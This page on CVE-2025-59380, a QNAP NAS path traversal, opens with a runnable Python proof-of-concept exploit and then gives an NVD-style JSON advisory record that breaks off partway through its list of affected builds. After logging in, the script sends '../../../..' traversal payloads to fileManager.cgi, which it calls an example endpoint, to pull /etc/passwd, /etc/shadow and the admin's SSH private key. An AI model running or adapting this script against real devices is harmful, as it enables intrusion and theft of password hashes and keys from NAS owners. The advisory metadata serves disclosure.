CVE-2025-59380

#!/usr/bin/env python3 """ CVE-2025-59380 PoC - QNAP Path Traversal Vulnerability Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys from urllib.parse import quote def exploit_qnap_path_traversal(target_url, username, password): """ Exploit path traversal vulnerability in QNAP NAS """ # Login first to obtain session login_url = f"{target_url}/cgi-bin/authLogin.cgi" login_data = { "username": username, "password": password } session = requests.Session() try: # Attempt login login_response = session.post(login_url, data=login_data, timeout=10) if login_response.status_code != 200: print("[-] Login failed - check credentials") return False # Path traversal attack - read /etc/passwd files_to_read = [ "/etc/passwd", "/etc/shadow", "/home/admin/.ssh/id_rsa" ] # Vulnerable endpoint (example) vuln_url = f"{target_url}/cgi-bin/fileManager.cgi" for file_path in files_to_read: # Encode path traversal payload payload = "../../../.." + file_path params = { "a": "download", "source": payload } print(f"[*] Attempting to read: {file_path}") try: response = session.get(vuln_url, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Success! File content:\n{response.text[:500]}") else: print(f"[-] Failed to retrieve {file_path}") except Exception as e: print(f"[-] Error: {e}") return True except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") print(f"Example: {sys.argv[0]} https://192.168.1.100 admin Password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_qnap_path_traversal(target, user, pwd)

{"cve": {"id": "CVE-2025-59380", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:16:59.873", "lastModified": "2026-01-06T13:58:34.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3332 build 20251128 and later\nQuTS hero h5.2.8.3321 build 20251117 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2737:build_20240417:*:*:*:*:*:*", "matchCriteriaId": "F4026A4B-7AB4-48EA-971D-88DFDD3F01A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2744:build_20240424:*:*:*:*:*:*", "matchCriteriaId": "1F3F99BB-0D68-4D74-92C8-59E24F96C50D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2782:build_20240601:*:*:*:*:*:*", "matchCriteriaId": "1DE63B4D-8E84-41D3-B1F3-04AE6040242B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2802:build_20240620:*:*:*:*:*:*", "matchCriteriaId": "75746563-C648-4E55-9126-703F915F8B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2823:build_20240711:*:*:*:*:*:*", "matchCriteriaId": "AF6BA027-A635-4E90-80C8-130B10AB3D23"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2851:build_20240808:*:*:*:*:*:*", "matchCriteriaId": "5406F242-A215-4B07-809F-7A7CE55ACE71"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.0.2860:build_20240817:*:*:*:*:*:*", "matchCriteriaId": "FA17778E-B3B1-44DD-B4E9-5AD25A3E804C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.1.2930:build_20241025:*:*:*:*:*:*", "matchCriteriaId": "E3FC6646-2247-4ED9-9643-CD376674E2E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.2.2950:build_20241114:*:*:*:*:*:*", "matchCriteriaId": "62170342-067D-442C-88FB-64A4BEA8AFE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.3.3006:build_20250108:*:*:*:*:*:*", "matchCriteriaId": "82464467-E1E6-47E1-BDE5-DDFA52994A47"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3070:build_20250312:*:*:*:*:*:*", "matchCriteriaId": "75AE902C-0516-4341-9BF0-21D8803E091C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3079:build_20250321:*:*:*:*:*:*", "matchCriteriaId": "5B005D70-8C91-48D4-B09A-9EBE2E9E5090"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.4.3092:build_20250403:*:*:*:*:*:*", "matchCriteriaId": "82FE5F89-A0E1-4D1B-A363-0A0D4141F502"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qts:5.2.5.3145:build_20250526:*:*:*:*:*:*", "m ... (truncated)